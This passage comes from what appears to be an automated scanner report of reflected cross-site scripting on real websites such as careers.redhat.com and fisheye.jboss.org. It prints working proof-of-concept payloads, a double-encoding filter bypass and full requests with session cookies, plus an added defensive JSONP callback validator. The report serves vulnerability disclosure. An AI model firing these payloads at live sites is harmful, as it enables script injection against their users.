        referLink.href = "http://www.webmetrics.com/landingpage/Mon_google_tech2.html?src=Paid Search&kw=cloud computing&lsd=Googlecbdf8";alert(1)//c8bc67fd179&cta=Webmetrics Trial&pf=Webmetrics&cid=1234&lp=http://www.webmetrics.com/landingpage/Mon_google_tech2.html";
        document.body.appendChild(referLink);
                    location.replace("h
...[SNIP]...

4.103. http://boulevardr.us1.list-manage.com/subscribe/post-json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boulevardr.us1.list-manage.com
Path:   /subscribe/post-json

Issue detail

The value of the c request parameter (the JSONP callback name) is copied unencoded into the start of the response body. The payload 19f53<script>alert(1)</script>8e5491c7616 was submitted in the c parameter. This input was echoed unmodified in the application's response. Note that the response is served as application/json rather than text/html (see below), so a browser executes the injected markup only if it sniffs the body as HTML; the response carries no X-Content-Type-Options: nosniff header, which is what would rule that out. The underlying defect is the same either way: the callback name is not restricted to a JavaScript identifier.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /subscribe/post-json?u=daebe79d0098f97bb580d51a6&id=542001acb8&c=?19f53<script>alert(1)</script>8e5491c7616 HTTP/1.1
Host: boulevardr.us1.list-manage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 16:09:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Content-Length: 92
Connection: close
Content-Type: application/json; charset=utf-8

?19f53<script>alert(1)</script>8e5491c7616({"result":"error","msg":"Unable to send mail. "})

4.104. https://careers.redhat.com/ext/search [Category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://careers.redhat.com
Path:   /ext/search

Issue detail

The value of the Category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1c66"><img%20src%3da%20onerror%3dalert(1)>a58178b7e64 was submitted in the Category parameter. This input was echoed as b1c66"><img src=a onerror=alert(1)>a58178b7e64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ext/search?act=list&Keyword=jboss&Category=b1c66"><img%20src%3da%20onerror%3dalert(1)>a58178b7e64&Location= HTTP/1.1
Host: careers.redhat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 16:11:26 GMT
Cache-Control: private
Content-Length: 50545
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSSACDQST=DCDDAEJAIMGLODLBPBGPCBHA; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>redhat.com Careers</title>
...[SNIP]...
<a href="/ext/search?act=list&Sortedby=SearchJobID&SortDir=Asc&Category=b1c66"><img src=a onerror=alert(1)>a58178b7e64&Location=&Keyword=jboss&SearchJobID=&PostalCode=&DistanceUnit=&SearchRadius=" style="color:#ffffff;">
...[SNIP]...

4.105. https://careers.redhat.com/ext/search [Category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://careers.redhat.com
Path:   /ext/search

Issue detail

The value of the Category request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2c76"-alert(1)-"5322cc6fab2 was submitted in the Category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ext/search?act=list&Keyword=jboss&Category=d2c76"-alert(1)-"5322cc6fab2&Location= HTTP/1.1
Host: careers.redhat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 16:11:29 GMT
Cache-Control: private
Content-Length: 50329
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSSACDQST=DDDDAEJAEJJHHICMKIIEIIPC; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>redhat.com Careers</title>
...[SNIP]...
<script>
   function Submit_Query_Jtitle() {
       window.location= "/ext/search?act=list&Sortedby=JobTitle&SortDir=Asc&Category=d2c76"-alert(1)-"5322cc6fab2&Location=&Keyword=jboss&SearchJobID=&PostalCode=&DistanceUnit=&SearchRadius=";
   }
   function Submit_Query_Location() {
       window.location= "/ext/search?act=list&Sortedby=Location&SortDir=Asc&Category
...[SNIP]...

4.106. http://community.jboss.org/view-people-tagcloud.jspa [queryEncoded parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.jboss.org
Path:   /view-people-tagcloud.jspa

Issue detail

The value of the queryEncoded request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ef39'%3balert(1)//6e03cdf3cdc was submitted in the queryEncoded parameter. This input was echoed as 6ef39';alert(1)//6e03cdf3cdc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /view-people-tagcloud.jspa?queryEncoded=eyJ1aWQiOi0xLCJyZHUiOmZhbHNlLCJycCI6dHJ1ZSwic24iOnRydWUsInNucCI6dHJ1ZSwicmV1IjpmYWxzZSwicmF1aWQiOmZhbHNlLCJzcCI6dHJ1ZSwic2UiOnRydWUsInJvdSI6ZmFsc2UsImZjdCI6ZmFsc2UsIm14Y2QiOi0xLCJzdW4iOnRydWUsIm1uY2QiOi0xLCJydWlkIjpmYWxzZSwicCI6IiIsInBrIjoicHNxXzk4Mjc1NTI5MHwtMSJ96ef39'%3balert(1)//6e03cdf3cdc&_=1289831042783 HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://community.jboss.org/people
x-j-token: no-user
x-requested-with: XMLHttpRequest
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: community.jboss.org
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=E76140915DFB659E953BB107D6B8063A; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sq=%5B%5BB%5D%5D; __utmc=241501529; rh_omni_tc=70160000000H4AjAAK; s_nr=1289831032929; s_vnum=1292422844821%26vn%3D1; s_invisit=true; __utma=241501529.1102710681.1289830845.1289830845.1289830845.1; __utmb=241501529.3.10.1289830845; __utmz=241501529.1289830845.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jive.server.info="serverName=community.jboss.org:serverPort=80:contextPath=:localName=clearspace02.app.mwc.hst.phx2.redhat.com:localPort=8080:localAddr=10.5.106.15"; JSESSIONID=DDE1B860157F60EF7F32B1C587D04C48.node0; __utma=153813930.861303267.1289831027.1289831027.1289831027.1; __utmb=153813930.1.10.1289831027; __utmc=153813930; __utmz=153813930.1289831027.1.1.utmcsr=jboss.org|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:34:21 GMT
Server: Apache-Coyote/1.1
X-JAL: 6
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
X-JSL: D=7877 t=1289831661232556
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Connection: close
Content-Length: 18802


<!-- BEGIN result tag cloud -->
<label>By Tags:</label>

<div id="jive-tags-popularlist">
<!-- BEGIN popular tags list -->
<div id="jive-populartags">
<ul class="jive-tagcloud-lis
...[SNIP]...
6dHJ1ZSwicmV1IjpmYWxzZSwicmF1aWQiOmZhbHNlLCJzcCI6dHJ1ZSwic2UiOnRydWUsInJvdSI6ZmFsc2UsImZjdCI6ZmFsc2UsIm14Y2QiOi0xLCJzdW4iOnRydWUsIm1uY2QiOi0xLCJydWlkIjpmYWxzZSwicCI6IiIsInBrIjoicHNxXzk4Mjc1NTI5MHwtMSJ96ef39';alert(1)//6e03cdf3cdc';
<!-- tag cloud calculation completed -->
...[SNIP]...

4.107. https://community.jboss.org/login.jspa [emailAddress parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://community.jboss.org
Path:   /login.jspa

Issue detail

The value of the emailAddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52342"><script>alert(1)</script>817de34b9e88d53ed was submitted in the emailAddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert it to a GET request, which makes the attack easier to demonstrate and to deliver (for example as a plain link).

Request

GET /login.jspa?emailAddress=rtfm@fastdial.net52342"><script>alert(1)</script>817de34b9e88d53ed&method%3Aregister=true&registerOnly=false HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://community.jboss.org/login.jspa
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: community.jboss.org
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=E76140915DFB659E953BB107D6B8063A; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sq=redhatglobal%2Credhatjbossorg%3D%2526pid%253Dhttps%25253A//community.jboss.org/login.jspa%2526oid%253DConfirm%252520address%2526oidt%253D3%2526ot%253DSUBMIT%2526oi%253D440; __utmc=241501529; rh_omni_tc=70160000000H4AjAAK; s_nr=1289831147323; s_vnum=1292422844821%26vn%3D1; s_invisit=true; __utma=241501529.1102710681.1289830845.1289830845.1289830845.1; __utmb=241501529.3.10.1289830845; __utmz=241501529.1289830845.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jive.server.info="serverName=community.jboss.org:serverPort=80:contextPath=:localName=clearspace02.app.mwc.hst.phx2.redhat.com:localPort=8080:localAddr=10.5.106.15"; JSESSIONID=DDE1B860157F60EF7F32B1C587D04C48.node0; __utma=153813930.861303267.1289831027.1289831027.1289831027.1; __utmb=153813930.1.10.1289831027; __utmz=153813930.1289831027.1.1.utmcsr=jboss.org|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmc=153813930

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 15:15:30 GMT
Server: Apache-Coyote/1.1
X-JAL: 11
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
X-JSL: D=22090 t=1289834130536927
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Connection: close
Content-Length: 46183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<input type="text" name="emailAddress" id="emailAddress" value="rtfm@fastdial.net52342"><script>alert(1)</script>817de34b9e88d53ed" class="jive-validate-email"/>
...[SNIP]...

4.108. http://devoxx.com/display/Devoxx2K10/Home [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://devoxx.com
Path:   /display/Devoxx2K10/Home

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a8f51--><script>alert(1)</script>db69e0aef33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /display/Devoxx2K10/Home?a8f51--><script>alert(1)</script>db69e0aef33=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:25:26 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289841926516
Set-Cookie: JSESSIONID=20A4F26984442A3D698F78937A8D5972; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38262

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Home?a8f51--><script>alert(1)</script>db69e0aef33=1'
contextPath : ''
action name : 'viewpage'
*********
adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@3ab9ffe0
adaptavist.builder.helper: com.atlass
...[SNIP]...

4.109. http://ds.addthis.com/red/psi/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/p.json

Issue detail

The value of the callback request parameter (the JSONP callback name) is copied unencoded into the start of the response body. The payload 7b95d<script>alert(1)</script>6a1369cd27b was submitted in the callback parameter. This input was echoed unmodified in the application's response. As with 4.103, the response is served as script (text/javascript) rather than HTML and carries no X-Content-Type-Options: nosniff header, so exploitability as reflected XSS depends on the browser sniffing the body as HTML; the defect itself is that the callback name is not restricted to a JavaScript identifier.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/p.json?callback=_ate.ad.hpr7b95d<script>alert(1)</script>6a1369cd27b HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Sun, 13 Feb 2011 06:29:43 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 15 Nov 2010 06:29:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Nov 2010 06:29:43 GMT
Connection: close

_ate.ad.hpr7b95d<script>alert(1)</script>6a1369cd27b({"urls":[],"segments" : [],"loc": "NzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg=="})
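Findings 4.103 and 4.109 are the same defect: a JSONP endpoint wraps its JSON in whatever callback name the request supplies. The following is an added example, not code from MailChimp, AddThis or this report: an allow-list check for callback names, and a response builder that sets the headers which stop a browser from sniffing the reply as HTML. The callback values are the ones from the two findings; the payload objects, function names and the 400 error body are constructed for the demo.

```javascript
// Added example (not the affected services' code). A JSONP callback is a
// function reference, so it must look like one: a dotted chain of JavaScript
// identifiers such as "_ate.ad.hpr" or "jQuery1710.cb". Anything else is
// rejected outright rather than "cleaned", so a bad name never reaches the
// response template.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;
const MAX_CALLBACK_LEN = 64;

function isSafeCallback(name) {
  return typeof name === 'string'
    && name.length > 0
    && name.length <= MAX_CALLBACK_LEN
    && CALLBACK_RE.test(name);
}

// JSON is not quite a JavaScript subset in older engines: U+2028/U+2029 are
// legal inside JSON strings but were line terminators in a JS string literal,
// so escape them before the JSON is placed inside a script.
function jsonForScript(payload) {
  return JSON.stringify(payload)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Build the JSONP reply. Returns {status, headers, body}.
function jsonpResponse(callback, payload) {
  const headers = {
    // Declare the body as script, and forbid MIME sniffing so a browser that
    // navigates to the URL directly cannot reinterpret it as HTML.
    'Content-Type': 'application/javascript; charset=utf-8',
    'X-Content-Type-Options': 'nosniff',
    'Cache-Control': 'no-store',
  };
  if (!isSafeCallback(callback)) {
    // Do not echo the rejected name anywhere in the reply.
    return {
      status: 400,
      headers: { ...headers, 'Content-Type': 'application/json; charset=utf-8' },
      body: JSON.stringify({ result: 'error', msg: 'invalid callback' }),
    };
  }
  // Leading comment: the response never begins with attacker-chosen bytes.
  return {
    status: 200,
    headers,
    body: '/**/' + callback + '(' + jsonForScript(payload) + ');',
  };
}

// Walk the legitimate callback and the two payloads from the findings above.
for (const cb of ['_ate.ad.hpr',
                  '_ate.ad.hpr7b95d<script>alert(1)</script>6a1369cd27b',
                  '?19f53<script>alert(1)</script>8e5491c7616']) {
  const r = jsonpResponse(cb, { result: 'ok' });
  console.log(r.status, r.body);
}
```

The allow-list is deliberately narrow: a callback that needs brackets, spaces or punctuation other than dots is not a function name and there is no legitimate reason to accept it. The nosniff header is what closes the content-sniffing route on its own; the identifier check is what removes the reflection.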

4.110. http://fisheye.jboss.org/browse [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fisheye.jboss.org
Path:   /browse

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5bf3"><script>alert(1)</script>2948a8d6823 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browse?e5bf3"><script>alert(1)</script>2948a8d6823=1 HTTP/1.1
Host: fisheye.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://fisheye.jboss.org/browse/
Cookie: FESESSIONID=8s2yaeqmbqpv16w8nsad69bey; crucibleprefs1="D%3D1289838739500%3Bslp%3Dt";

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 18:39:41 GMT
Server: Jetty(6.1.24)
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 33437


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Repositories</title>


<link rel="SH
...[SNIP]...
<a href="
/browse/?e5bf3"><script>alert(1)</script>2948a8d6823=1&amp;d=desc&amp;sort=display_name">
...[SNIP]...

4.111. http://fisheye.jboss.org/browse/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fisheye.jboss.org
Path:   /browse/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e81b"><script>alert(1)</script>239ec7c39ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browse/?6e81b"><script>alert(1)</script>239ec7c39ac=1 HTTP/1.1
Host: fisheye.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 18:39:35 GMT
Server: Jetty(6.1.24)
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 33439


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Repositories</title>


<link rel="SH
...[SNIP]...
<a href="
/browse/?d=desc&amp;sort=display_name&amp;6e81b"><script>alert(1)</script>239ec7c39ac=1">
...[SNIP]...

4.112. http://fisheye.jboss.org/changelog/~feedspan=1mo,feedmax=50/Seam [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fisheye.jboss.org
Path:   /changelog/~feedspan=1mo,feedmax=50/Seam

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b441%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06c6c8f234b was submitted in the REST URL parameter 2. This input was echoed as 1b441"><script>alert(1)</script>06c6c8f234b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /changelog/~feedspan1b441%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06c6c8f234b=1mo,feedmax=50/Seam HTTP/1.1
Host: fisheye.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:35:14 GMT
Server: Jetty(6.1.24)
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 324712


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Activity Seam/</title>


<link rel="SHORT
...[SNIP]...
<form action="/changelog/~feedspan1b441"><script>alert(1)</script>06c6c8f234b=1mo,feedmax=50/Seam/" class="changelog-form">
...[SNIP]...

4.113. http://fisheye.jboss.org/changelog/~feedspan=1mo,feedmax=50/weld [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fisheye.jboss.org
Path:   /changelog/~feedspan=1mo,feedmax=50/weld

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6f00%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee171f9e0308 was submitted in the REST URL parameter 2. This input was echoed as a6f00"><script>alert(1)</script>e171f9e0308 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /changelog/~feedspana6f00%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee171f9e0308=1mo,feedmax=50/weld HTTP/1.1
Host: fisheye.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:35:17 GMT
Server: Jetty(6.1.24)
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 305553


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Activity weld/</title>


<link rel="SHORT
...[SNIP]...
<form action="/changelog/~feedspana6f00"><script>alert(1)</script>e171f9e0308=1mo,feedmax=50/weld/" class="changelog-form">
...[SNIP]...

4.114. http://flowplayer.org/tools/scrollable.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://flowplayer.org
Path:   /tools/scrollable.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0544"><img%20src%3da%20onerror%3dalert(1)>be18d6c294f was submitted in the REST URL parameter 1. This input was echoed as e0544"><img src=a onerror=alert(1)>be18d6c294f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /toolse0544"><img%20src%3da%20onerror%3dalert(1)>be18d6c294f/scrollable.html HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Mon, 15 Nov 2010 17:33:55 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Vary: Accept-Encoding
Cache-control: private
Content-Length: 5899


   <!DOCTYPE html>
   

<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen
   
   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<body id="toolse0544"><img src=a onerror=alert(1)>be18d6c294f_scrollable" class="msie tools">
...[SNIP]...

4.115. https://home.vembu.com/account.php [error parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://home.vembu.com
Path:   /account.php

Issue detail

The value of the error request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84984</script><script>alert(1)</script>cd92040e158 was submitted in the error parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account.php?page=login&error=84984</script><script>alert(1)</script>cd92040e158 HTTP/1.1
Host: home.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vhbsc=bvvf4kfqpt8c7u7r1prvh56in2;

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 06:57:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="google-site-ve
...[SNIP]...
display","none");
//$("#message").css("display","block");
// $("#message_container").css("position","static");
//$("#message").css("width","979px");

showMessage(0,true,"84984</script><script>alert(1)</script>cd92040e158","","");
});

$(document).ready(function() {
showLogin();
var ua=navigator.userAgent.toLowerCase();
if(!((ua.indexOf('konqueror')!=-1) && /khtml\/3\.[0-4]/.test(u
...[SNIP]...

4.116. http://img.mediaplex.com/content/0/11921/102238/circa_300x250Revised.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/11921/102238/circa_300x250Revised.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f1ba"%3balert(1)//575707e5323 was submitted in the mpck parameter. This input was echoed as 9f1ba";alert(1)//575707e5323 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/11921/102238/circa_300x250Revised.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F11921-102238-1358-0%3Fmpt%3D2010.11.15.07.15.419f1ba"%3balert(1)//575707e5323&mpt=2010.11.15.07.15.41&mpvc= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Cookie: svid=804356890302; mojo3=11921:1358/11321:1358/14662:28901/1551:17023/9608:2042/7992:3633/9966:3945/12309:28487; mojo2=12109:16388/9966:3945; mojo1=s/47634/10
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:20:29 GMT
Server: Apache
Last-Modified: Thu, 24 Jun 2010 14:58:41 GMT
ETag: "428a17-b94-489c7e3d92a40"
Accept-Ranges: bytes
Content-Length: 4201
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
<a href=\"http://altfarm.mediaplex.com/ad/ck/11921-102238-1358-0?mpt=2010.11.15.07.15.419f1ba";alert(1)//575707e5323\" target=\"_blank\">
...[SNIP]...

4.117. http://img.mediaplex.com/content/0/11921/102238/circa_300x250Revised.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/11921/102238/circa_300x250Revised.js

Issue detail

